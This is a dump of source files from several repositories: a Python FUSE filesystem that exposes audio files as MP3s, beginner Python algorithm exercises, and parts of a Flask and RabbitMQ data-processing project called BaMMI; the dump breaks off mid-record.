[ { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 17.600000381469727, "blob_id": "aeddad268cb849df7db8f2730c3839f06a43606b", "content_id": "6ec1aa2e977c68b6355f8fc9bb8f9ed1153d3a00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 93, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/nbproject/project.properties", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "java.lib.path=\nmain.file=gstreamerfs.py\nplatform.active=default\npython.lib.path=\nsrc.dir=src\n" }, { "alpha_fraction": 0.7428571581840515, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 17, "blob_id": "c1770c065badaa2f614f0ef19d5608962075d78f", "content_id": "52df70d5a844023a08e1cd6310f7d529f854fd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/src/GstreamerFS/__init__.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "from FS import *\nfrom File import *" }, { "alpha_fraction": 0.5433155298233032, "alphanum_fraction": 0.5460656881332397, "avg_line_length": 32.06060791015625, "blob_id": "e8bdc53d516e6b1f716d1370b5691db46e32b5ee", "content_id": "0bfd43248b131e02a0da7fdaac4f72717afd3bc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6545, "license_type": "no_license", "max_line_length": 85, "num_lines": 198, "path": "/src/GstreamerFS/FS.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "import os.path\nimport os\nfrom errno import *\nfrom stat import *\n\nimport fuse\nfrom fuse import Fuse\nimport syslog\nimport GstreamerFS\n\nclass FS(Fuse):\n\n def __init__(self, *args, **kw):\n\n Fuse.__init__(self, *args, **kw)\n\n # do stuff to set up your filesystem here, if you want\n #import thread\n #thread.start_new_thread(self.mythread, ())\n self.root = '/'\n# self.file_class = GstreamerFSFile\n self.files = {}\n\n def main(self, *args, **kwargs):\n fuse = self\n\n class FileClass(GstreamerFS.File):\n def __init__(self, *args, **kwargs):\n syslog.syslog('fuse: %s' % fuse)\n syslog.syslog('self: %s' % self)\n GstreamerFS.File.__init__(self, fuse, *args, **kwargs)\n\n self.file_class = FileClass\n return Fuse.main(self, *args, **kwargs)\n\n# def mythread(self):\n#\n# \"\"\"\n# The beauty of the FUSE python implementation is that with the python interp\n# running in foreground, you can have threads\n# \"\"\"\n# print \"mythread: started\"\n# while 1:\n# time.sleep(120)\n# print \"mythread: ticking\"\n\n def getattr(self, path):\n syslog.syslog('Function getattr(%s) called' % (path))\n\n# syslog.syslog('Path: %s' % path)\n# syslog.syslog('self.files: %s' % self.files)\n\n if (self.files.has_key(path)):\n# syslog.syslog('self.files[%s] = %s' % (path, self.files[path]))\n path = self.files[path]\n\n return os.lstat(\".\" + path)\n\n def readlink(self, path):\n syslog.syslog('Function readlink(%s) called' % (path))\n return os.readlink(\".\" + path)\n\n def readdir(self, path, offset):\n syslog.syslog('Function readdir(%s, %s) called' % (path, offset))\n\n if os.path.isdir(\".\" + path):\n yield fuse.Direntry('.')\n yield fuse.Direntry('..')\n\n #op volgorde van proberen: meer achteraan is liever niet\n extensions = ['.wav', '.flac', '.ogg', '.wma']\n for e in os.listdir(\".\" + path):\n f = self.root + path + os.sep + e\n syslog.syslog('file: ' + f)\n\n if os.path.isfile(f):\n basename, extension = os.path.splitext(e)\n #Take into account that some files could be double:\n # e.g.: test.flac, test.ogg\n if extension.lower() in extensions:\n\n syslog.syslog('Returning: ' + basename + '.mp3')\n self.files[path + os.sep + basename + '.mp3'] = path + os.sep + e\n yield fuse.Direntry(basename + '.mp3')\n syslog.syslog('Transcode file: ' + f)\n continue\n else:\n yield fuse.Direntry(e)\n continue\n else:\n yield fuse.Direntry(e)\n continue\n\n def unlink(self, path):\n os.unlink(\".\" + path)\n\n def rmdir(self, path):\n os.rmdir(\".\" + path)\n\n def symlink(self, path, path1):\n os.symlink(path, \".\" + path1)\n\n def rename(self, path, path1):\n os.rename(\".\" + path, \".\" + path1)\n\n def link(self, path, path1):\n os.link(\".\" + path, \".\" + path1)\n\n def chmod(self, path, mode):\n os.chmod(\".\" + path, mode)\n\n def chown(self, path, user, group):\n os.chown(\".\" + path, user, group)\n\n def truncate(self, path, len):\n syslog.syslog('Function truncate(%s, %s) called' % (path, len))\n f = open(\".\" + path, \"a\")\n f.truncate(len)\n f.close()\n\n def mknod(self, path, mode, dev):\n os.mknod(\".\" + path, mode, dev)\n\n def mkdir(self, path, mode):\n syslog.syslog('Function mkdir(%s, %s) called' % (path, mode))\n os.mkdir(\".\" + path, mode)\n\n def utime(self, path, times):\n syslog.syslog('Function utime(%s, %s) called' % (path, times))\n os.utime(\".\" + path, times)\n\n# The following utimens method would do the same as the above utime method.\n# We can't make it better though as the Python stdlib doesn't know of\n# subsecond preciseness in acces/modify times.\n#\n# def utimens(self, path, ts_acc, ts_mod):\n# os.utime(\".\" + path, (ts_acc.tv_sec, ts_mod.tv_sec))\n\n def access(self, path, mode):\n syslog.syslog('Function access(%s, %s) called' % (path, mode))\n\n syslog.syslog('Function getattr(%s) called' % (path))\n\n# syslog.syslog('Path: %s' % path)\n# syslog.syslog('self.files: %s' % self.files)\n\n if (self.files.has_key(path)):\n# syslog.syslog('self.files[%s] = %s' % (path, self.files[path]))\n path = self.files[path]\n\n if not os.access(\".\" + path, mode):\n return -EACCES\n\n# This is how we could add stub extended attribute handlers...\n# (We can't have ones which aptly delegate requests to the underlying fs\n# because Python lacks a standard xattr interface.)\n#\n# def getxattr(self, path, name, size):\n# val = name.swapcase() + '@' + path\n# if size == 0:\n# # We are asked for size of the value.\n# return len(val)\n# return val\n#\n# def listxattr(self, path, size):\n# # We use the \"user\" namespace to please XFS utils\n# aa = [\"user.\" + a for a in (\"foo\", \"bar\")]\n# if size == 0:\n# # We are asked for size of the attr list, ie. joint size of attrs\n# # plus null separators.\n# return len(\"\".join(aa)) + len(aa)\n# return aa\n\n def statfs(self):\n \"\"\"\n Should return an object with statvfs attributes (f_bsize, f_frsize...).\n Eg., the return value of os.statvfs() is such a thing (since py 2.2).\n If you are not reusing an existing statvfs object, start with\n fuse.StatVFS(), and define the attributes.\n\n To provide usable information (ie., you want sensible df(1)\n output, you are suggested to specify the following attributes:\n\n - f_bsize - preferred size of file blocks, in bytes\n - f_frsize - fundamental size of file blcoks, in bytes\n [if you have no idea, use the same as blocksize]\n - f_blocks - total number of blocks in the filesystem\n - f_bfree - number of free blocks\n - f_files - total number of file inodes\n - f_ffree - nunber of free file inodes\n \"\"\"\n\n syslog.syslog('Function statfs() called')\n return os.statvfs(\".\")\n\n def fsinit(self):\n print \"fsinit()...\"\n os.chdir(self.root)" }, { "alpha_fraction": 0.6168371438980103, "alphanum_fraction": 0.6262785196304321, "avg_line_length": 22.55555534362793, "blob_id": "8553e37c0445f962db56392e38d518c3c6503a34", "content_id": "018d81ee2869d378d13873430ed1a606866daa54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1271, "license_type": "no_license", "max_line_length": 90, "num_lines": 54, "path": "/src/gstreamerfs.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# Copyright (C) 2001 Jeff Epler <[email protected]>\n# Copyright (C) 2006 Csaba Henk <[email protected]>\n#\n# This program can be distributed under the terms of the GNU LGPL.\n# See the file COPYING.\n#\n\nimport os\nimport sys\n\nimport fuse\nfrom fuse import Fuse\nimport GstreamerFS\n\nimport syslog\nsyslog.openlog('gstreamerFS')\n\nif not hasattr(fuse, '__version__'):\n raise RuntimeError, \\\n \"your fuse-py doesn't know of fuse.__version__, probably it's too old.\"\n\nfuse.fuse_python_api = (0, 2)\n\n# We use a custom file class\nfuse.feature_assert('stateful_files', 'has_init')\n\ndef main():\n\n usage = \"\"\"\nUserspace nullfs-alike: mirror the filesystem tree from some point on.\n\n\"\"\" + Fuse.fusage\n\n server = GstreamerFS.FS(version=\"%prog \" + fuse.__version__,\n usage=usage)\n\n server.parser.add_option(mountopt=\"root\", metavar=\"PATH\", default='/',\n help=\"mirror filesystem from under PATH [default: %default]\")\n server.parse(values=server, errex=1)\n\n try:\n if server.fuse_args.mount_expected():\n os.chdir(server.root)\n except OSError:\n print >> sys.stderr, \"can't enter root of underlying filesystem\"\n sys.exit(1)\n\n server.main()\n\n\nif __name__ == '__main__':\n main()" } ]
4
Zhoulonghai/zlh1
https://github.com/Zhoulonghai/zlh1
550fa80f2d6e49babb9f649cf82e34d3dd6266f6
eab681ae12fe4b07dbab03f2aa3b034583ec283e
cc0ad1141b55c75d677230ce9176e4d609dfdcb1
refs/heads/master
2022-06-13T22:10:00.459428
2020-05-07T12:52:47
2020-05-07T12:52:47
262,047,245
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.48688048124313354, "alphanum_fraction": 0.5364431738853455, "avg_line_length": 23.571428298950195, "blob_id": "73637cf8ef5d1dafd3fe0d12b9f2f97d76ae4a98", "content_id": "113318cf435821ca392390ec7b3cfdc7094a807f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 114, "num_lines": 14, "path": "/Python_tutorial1/Python0007.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0007】杨辉三角形\n\ndef YangHui (num):\n LL = [[1]]\n for i in range(1,num):\n LL.append([(0 if j == 0 else LL[i-1][j-1])+ (0 if j == len(LL[i-1]) else LL[i-1][j]) for j in range(i+1)])\n return LL\na = int(input())\nfor i in YangHui(a+1):\n for j in i:\n print(\"%5d\"%j,end=\"\")\n print()" }, { "alpha_fraction": 0.4032258093357086, "alphanum_fraction": 0.47235023975372314, "avg_line_length": 24.58823585510254, "blob_id": "eefefaa7d0c93a01200d304ea5b18b227c4376ef", "content_id": "8b91148401ad7b255c340c43f1e9f3ed165a62db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/Python_tutorial1/Python0011.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0011】牛顿迭代法\nfrom math import fabs\n\ndef solut(a,b,c,d,e):\n x1=e\n # 迭代:\n while True:\n x=x1\n f = ((a * x + b) * x + c) * x + d #原函数\n f1 = (3 * a * x + 2 * b) * x + c #求导的函数\n x1 = x - f / f1\n if (fabs(x1 - x) <= 0.00000001):\n return x1\nnum = [float(n) for n in input('').split()]\nprint((\"%0.2f\")%(solut(num[0],num[1],num[2],num[3],num[4])))" }, { "alpha_fraction": 0.4480000138282776, "alphanum_fraction": 0.492000013589859, "avg_line_length": 12.94444465637207, "blob_id": "84993d25bca7059c07a6d4faefdee508116f9634", "content_id": "2c1574b355ec68385b09f9f0f5423f5f68adaf11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "no_license", "max_line_length": 22, "num_lines": 18, "path": "/Python_tutorial1/Python0010.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0010】正整数的因子展开式\n\na=int(input())\nb=str(a)\nnum=[]\ni=1\nwhile i <= a:\n if a%i == 0:\n a = a/i\n num.append(i)\n i = 1\n i+=1\nb+='='+str(num[1])\nfor j in num[2:]:\n b+=\"*\"+str(j)\nprint(b)" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5130568146705627, "avg_line_length": 28.636363983154297, "blob_id": "2eed3cd6967499efbf2afdcb45d1292437231116", "content_id": "74bc121fe9dc0fac7878910bfa88038b14c0fc77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 69, "num_lines": 22, "path": "/Python_tutorial1/Python0005.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0005】模拟页面调度LRU算法\ndef LRU(pages, maxNum, n):\n temp = []\n times = 0\n for page in lst:\n num = len(temp)\n if num < n: # 有空闲主存块\n temp.append(page)\n elif num == n: # 没有空闲主存块\n if page in temp: # 要访问的新页面已在主存块中,处理“主存块”,把最新访问的页面交换到列表尾部\n pos = temp.index(page)\n temp = temp[:pos] + temp[pos + 1:] + [page]\n else: # 要访问的新页面不在主存块中,把最早访问的页面踢掉,调入新页面\n temp.pop(0)\n temp.append(page)\n times += 1\n return times\nn = int(input())\nlst = tuple(input().split(\" \"))\nprint(LRU(lst, 3, n))" }, { "alpha_fraction": 0.5032397508621216, "alphanum_fraction": 0.53995680809021, "avg_line_length": 20.090909957885742, "blob_id": "87ba25ce17be4ca8fb2ec1f26aaac6a770ac5328", "content_id": "6131483df8a8b13c18482d33113d583c8b6e4eca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 475, "license_type": "no_license", "max_line_length": 37, "num_lines": 22, "path": "/Python_tutorial1/Python0004.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0004】验证6174猜想\ndef Min_Number(a):\n a = str(a)\n arr = []\n for i in range(0,4):\n arr.append(a[i])\n arr.sort()\n return int(''.join(arr))\ndef Max_Number(a):\n a = str(a)\n arr = []\n for i in range(0, 4):\n arr.append(a[i])\n arr.sort(reverse=True)\n return int(''.join(arr))\na = input()\nprint(a,end=' ')\nwhile (int(a) != 6174):\n a = Max_Number(a) - Min_Number(a)\n print(a , end=\" \")" }, { "alpha_fraction": 0.4921875, "alphanum_fraction": 0.5234375, "avg_line_length": 21.10344886779785, "blob_id": "759ce8f748e871e788b27204dc118f49aad96571", "content_id": "983b65d6405c6125bbb9cf12ede0e8ce5bedf53d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 67, "num_lines": 29, "path": "/Python_tutorial1/Python0008.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "# coding=utf-8\n# author = zhoulonghai\n# 【Python0008】筛法求素数\n\nimport numpy\nimport math\nnum = [int(n) for n in input('').split()]\nMAX_INT = num[1]\nMIN_INT = num[0]\nmarks_bool = [True] * (MAX_INT + 1)\nfor i in range(2,int(math.sqrt(MAX_INT)) + 1):\n j = i\n k = j\n while j * k <= MAX_INT:\n marks_bool[j * k] = False\n k += 1\nsum_int = 0\nl = []\nfor i in range(2,MAX_INT + 1):\n if marks_bool[i] is True:\n if(i >= MIN_INT):\n l.append(i)\nkm = [num for elem in numpy.array(l).reshape(-1,5) for num in elem]\np = 1\nfor num in km:\n print(num , \" \", end =\"\")\n if p % 5 == 0 :\n print(\"\")\n p = p + 1" }, { "alpha_fraction": 0.5691699385643005, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 18.538461685180664, "blob_id": "06bbc16404fe1f2c91130ff89fa19bcfd826e0a6", "content_id": "4a6753cff5d74f0650efe46340e9bd481392e61b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/Python_tutorial1/Python0003.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0003】蒙特·卡罗法计算圆周率\nimport random\n#使用扩展库 random\nnum=int(input())\nok=0\nfor i in range(1,num+1):\n x = random.uniform(-1,1)#到-1到1的随机数\n y = random.uniform(-1,1)\n if(x*x+y*y<=1):\n ok+=1\nprint(ok/num*4)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5510948896408081, "avg_line_length": 18.64285659790039, "blob_id": "bf4e07d238c9a1d8817b033ac4703cd4bfbfb38a", "content_id": "9518a71191a169a4d6defe3b611e2fcd13720e4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/Python_tutorial1/Python0006.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0006】爬楼梯\ndef climb(num):\n if num == 1:\n return 1\n if num == 2:\n return 2\n if num == 3:\n return 4\n else:\n sum = climb(num-1)+climb(num-2)+climb(num-3)\n return sum\nprint(climb(int(input())))" }, { "alpha_fraction": 0.6927480697631836, "alphanum_fraction": 0.7041984796524048, "avg_line_length": 25.25, "blob_id": "f38703d519efcb3cc8981c3197f0fd5856de9f91", "content_id": "eb28763e1340f61ccb2d5205e4f4ab0fe7ed8a09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 62, "num_lines": 20, "path": "/Python_tutorial1/Python0002.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0002】排列组合序列\nimport itertools #Python的内建模块itertools提供了非常有用的用于操作迭代对象的函数。\nnum = input().split( ) #输入n和m\nm = int(num[1])\narr = input().split( ) #输入n个字母\n#permutations和combinations都是得到一个迭代器\ncom = list(itertools.combinations(arr,m)) #combinations方法重点在组合\nper = list(itertools.permutations(arr,m)) #permutations方法重在排列\nprint(\"Permutation:\" )\nfor i in per:\n for j in i:\n print(j , end=\" \")\n print()\nprint(\"Combination:\" )\nfor i in com:\n for j in i:\n print(j , end=\" \")\n print()" }, { "alpha_fraction": 0.4846266508102417, "alphanum_fraction": 0.516837477684021, "avg_line_length": 19.117647171020508, "blob_id": "f3a0c95450968fb4d81e58bcd31cfb3d4f3bd6a2", "content_id": "9aedeb0aac3693b45cc51b5eb6860b76f35231bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 695, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/Python_tutorial1/Python0009.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0009】查找鞍点\n\nlist1=[]\nlist_max=[]\nlist_min=[]\nfor i in range(5):\n list=input().split()\n list_int=[int(x) for x in list]\n list1.append(list_int )\n k=0\n for j in list_int:\n if j==max(list_int):\n break\n k=k+1\n list_max.append([i+1,k+1, max(list_int)])\n#print(list_max)\nlist2=[[list1[j][i] for j in range(5)] for i in range(5)]\ni=0\nfor l in list2:\n i=i+1\n k = 0\n for j in l :\n if j == min(l):\n break\n k = k + 1\n list_min.append([ k + 1,i, min(l)])\n#print(list_min)\n\nfor i in list_max:\n for j in list_min:\n if str(i)==str(j):\n print(i,end=\" \")" } ]
10
roypel/BaMMI
https://github.com/roypel/BaMMI
f65a5c7bd57e185a9a828091c8b7c6a537aa5db9
64528738bfe4a9a48dcf1417e63e9116f24953a4
302e9764a9f419bc558200846e2e7a289d200654
refs/heads/master
2022-09-21T00:23:00.648010
2022-08-25T17:37:18
2022-08-25T17:37:18
230,133,137
0
0
null
2019-12-25T17:20:49
2022-01-17T20:40:20
2022-08-25T17:37:18
Python
[ { "alpha_fraction": 0.662715494632721, "alphanum_fraction": 0.662715494632721, "avg_line_length": 39.34782791137695, "blob_id": "3925ec9e566d2774b8b00871d1477f9c96a3de69", "content_id": "33bdfd1669a0519020d52f4194acc91356116314", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 107, "num_lines": 23, "path": "/BaMMI/saver/Saver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from ..utils.DBWrapper import DBWrapper\nfrom ..utils.PubSuber import PubSuber\nfrom ..utils.UtilFunctions import extract_json_from_raw_data\n\n\nclass Saver:\n\n def __init__(self, db_url):\n self.db_con = DBWrapper(db_url)\n self.known_fields = ['pose', 'feelings', 'color_image', 'depth_image']\n\n def save(self, topic_name, data):\n if topic_name in self.known_fields:\n user_data, snapshot_data = extract_json_from_raw_data(data)\n self.db_con.insert_snapshot_data_by_user(user_data, snapshot_data, topic_name)\n else:\n raise ValueError(f\"Unknown field {topic_name}\")\n\n def consume_topics(self, mq_url):\n pubsuber = PubSuber(mq_url)\n pubsuber.init_exchange('parsers_results', exchange_type='topic')\n pubsuber.bind_queue(binding_keys='#')\n pubsuber.consume_messages(lambda ch, method, properties, body: self.save(method.routing_key, body))\n" }, { "alpha_fraction": 0.7074379920959473, "alphanum_fraction": 0.7074379920959473, "avg_line_length": 39.33333206176758, "blob_id": "5d3dd12c7678ff1185f0479d8fe2557967ccc53c", "content_id": "193cc04c6220f0cc85605954bea87e029296400a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 112, "num_lines": 15, "path": "/BaMMI/parsers/all_parsers/DepthImage.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef parse_depth_image(context, snapshot):\n if 'depth_image' not in snapshot:\n raise KeyError(\"Snapshot is missing the Depth Image data\")\n save_path = context.generate_path('depth_image.jpg')\n depth_image = np.fromfile(snapshot['depth_image']['data'], dtype=float)\n depth_image = np.reshape(depth_image, (snapshot['depth_image']['height'], snapshot['depth_image']['width']))\n plt.imsave(save_path, depth_image, cmap='hot')\n return context.format_returned_data('depth_image', save_path)\n\n\nparse_depth_image.field = 'depth_image'\n" }, { "alpha_fraction": 0.6322008967399597, "alphanum_fraction": 0.6469719409942627, "avg_line_length": 26.079999923706055, "blob_id": "3782acdccd7967c68e6c67620fcf4a037be4e37f", "content_id": "675ebe85bb4de8ffe526a78f2870590305e3aeb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 96, "num_lines": 25, "path": "/BaMMI/utils/APIServer.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from flask import Flask\n\n\nclass EndpointAction:\n def __init__(self, action):\n self.action = action\n\n def __call__(self, *args, **kwargs):\n return self.action(*args, **kwargs)\n\n\nclass FlaskWrapper:\n app = None\n\n def __init__(self, name=__name__):\n self.app = Flask(name)\n\n def run(self, host='127.0.0.1', port=8000):\n self.app.run(host=host, port=port)\n\n def add_endpoint(self, endpoint=None, endpoint_name=None, handler=None, methods=None):\n self.app.add_url_rule(endpoint, endpoint_name, EndpointAction(handler), methods=methods)\n\n def register_blueprint(self, blueprint):\n self.app.register_blueprint(blueprint)\n" }, { "alpha_fraction": 0.6754658222198486, "alphanum_fraction": 0.6754658222198486, "avg_line_length": 34.77777862548828, "blob_id": "fc28b3ac07c652a8e38d0a9efd0294100ce0b050", "content_id": "42692cee4a6506c72c1be9fdcd99033f6cd92714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 78, "num_lines": 18, "path": "/BaMMI/parsers/all_parsers/ColorImage.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from PIL import Image as PILIm\n\n\ndef parse_color_image(context, snapshot):\n if 'color_image' not in snapshot:\n raise KeyError(\"Snapshot is missing the Color Image data\")\n save_path = context.generate_path('color_image.jpg')\n size = snapshot['color_image']['width'], snapshot['color_image']['height']\n image_data_path = snapshot['color_image']['data']\n with open(image_data_path, 'rb') as f:\n image_data = f.read()\n image = PILIm.new('RGB', size)\n image.frombytes(image_data)\n image.save(save_path)\n return context.format_returned_data('color_image', save_path)\n\n\nparse_color_image.field = 'color_image'\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 37, "blob_id": "f695d37b6988d8693861f364a325b27cf8d8dd4d", "content_id": "65b7dfea6bf3c696cdc64072b21d367f01ea30e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 37, "num_lines": 1, "path": "/BaMMI/parsers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .ParserHandler import run_parser\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6272727251052856, "avg_line_length": 10.100000381469727, "blob_id": "710c42a37fa4ff7278259b60a63717083daf5603", "content_id": "0c565c890d9e474d20e2119f1f572fd6e84c9726", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 110, "license_type": "no_license", "max_line_length": 25, "num_lines": 10, "path": "/scripts/run-pipeline.sh", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsudo docker-compose up -d\ncd ./tests\npytest\nwhile [ $? -ne 0 ]; do\n sleep 30\n pytest\ndone\ncd .." }, { "alpha_fraction": 0.6884120106697083, "alphanum_fraction": 0.6884120106697083, "avg_line_length": 29.657894134521484, "blob_id": "7c98e3d4573c3dcca988d136fe49900b948aafc7", "content_id": "c0c9efeb1c27f662765be8db190789a64d6ad300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 102, "num_lines": 38, "path": "/BaMMI/utils/UtilFunctions.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import json\nimport os\nfrom urllib.parse import urlparse\n\n\ndef ensure_dir(dir_path):\n full_path = os.path.expanduser(dir_path)\n if not os.path.isdir(full_path):\n os.makedirs(os.path.dirname(full_path), exist_ok=True)\n\n\ndef save_data_to_file(data, file_path, data_type=''):\n ensure_dir(file_path)\n with open(file_path, f'w{data_type}') as f:\n f.write(data)\n\n\ndef get_true_relative_path(file_path, relative_path):\n return os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(file_path)), relative_path))\n\n\ndef build_path_for_files_from_data(base_path, user_id, snapshot_timestamp, filename):\n return os.path.normpath(os.path.join(base_path, user_id, snapshot_timestamp, filename))\n\n\ndef find_driver(drivers, url):\n url_scheme = urlparse(url).scheme\n for scheme, cls in drivers.items():\n if url_scheme.lower() == scheme.lower():\n return cls(url)\n raise ValueError(\"Unknown type of URL was given\")\n\n\ndef extract_json_from_raw_data(raw_data):\n json_data = json.loads(raw_data)\n user_data = json_data['user_data']\n snapshot_data = json_data['snapshot_data']\n return user_data, snapshot_data\n" }, { "alpha_fraction": 0.6074918508529663, "alphanum_fraction": 0.6416938304901123, "avg_line_length": 28.238094329833984, "blob_id": "850906a9502c95d4d7862050d3882eb5ad641710", "content_id": "764a32c824a3f76174255857e59b90f6b50b2063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 614, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/BaMMI/api/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .API import run_api_server\nfrom ..utils.CLITemplate import log, main\nfrom ..utils.Constants import mongodb_url\n\n\[email protected]('run-server')\[email protected]('-h', '--host', default='127.0.0.1', type=str)\[email protected]('-p', '--port', default=5000, type=int)\[email protected]('-d', '--database', default=mongodb_url, type=str)\ndef run(host='127.0.0.1', port=5000, database=mongodb_url):\n log(run_api_server(host, port, database))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='api', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.6424010396003723, "alphanum_fraction": 0.6692209243774414, "avg_line_length": 33.043479919433594, "blob_id": "663757ddae26519588ab446252bb66bd44c54945", "content_id": "01a2fc49df33b8a615a70c9bba53e88b36e4b076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 783, "license_type": "no_license", "max_line_length": 95, "num_lines": 23, "path": "/BaMMI/server/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .Receiver import publish_to_message_queue\nfrom .Server import run_server\nfrom ..utils.CLITemplate import log, main\nfrom ..utils.Constants import rabbit_mq_url\n\n\[email protected]('run-server')\[email protected]('url', default=rabbit_mq_url, type=str)\[email protected]('-h', '--host', default='127.0.0.1', type=str)\[email protected]('-p', '--port', default=8000, type=int)\ndef run(url, host='127.0.0.1', port=8000):\n log(run_server(host, port, lambda user_data, snapshot, binary_type_data, array_type_data:\n publish_to_message_queue(user_data, snapshot, binary_type_data, array_type_data, url)))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='server', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.7159090638160706, "alphanum_fraction": 0.7159090638160706, "avg_line_length": 13.666666984558105, "blob_id": "0250a038911b974af44eacbf625fddc480292bc0", "content_id": "94b02a7a2efac72b9a14c910a397f31cad2fa0a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/BaMMI/utils/drivers/mq_drivers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .RabbitDriver import RabbitDriver\n\n\nmq_drivers = {\n 'rabbitmq': RabbitDriver,\n}\n" }, { "alpha_fraction": 0.6811279654502869, "alphanum_fraction": 0.6811279654502869, "avg_line_length": 37.25, "blob_id": "a8b041e6eb26e5b215641a2ec662c7b9c4260873", "content_id": "1d02c2e1341aa4a3f8c31f8e920c86d35eb3d585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 